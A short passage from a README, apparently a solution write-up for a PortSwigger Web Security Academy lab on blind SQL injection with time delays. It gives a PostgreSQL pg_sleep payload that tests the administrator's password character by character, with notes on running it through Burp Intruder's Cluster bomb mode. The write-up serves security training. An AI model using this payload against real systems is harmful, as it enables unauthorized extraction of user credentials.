HarshilBhuva/portswigger-websecurity-academy/01-sqli/Blind_SQL_injection_with_time_delays_and_information_retrieval/README.md

 `'||(SELECT pg_sleep(3) FROM users WHERE username='administrator' AND SUBSTR(password,1,1)='a')||'`

+// 📝 ADD PAYLOAD IN FIRST '1' AND THEN ON 'A'

 ![cookie for password enumeration](img/cookie_enumerate_password.png)

 Using Burp Intruder again, with attack type: *Cluster bomb*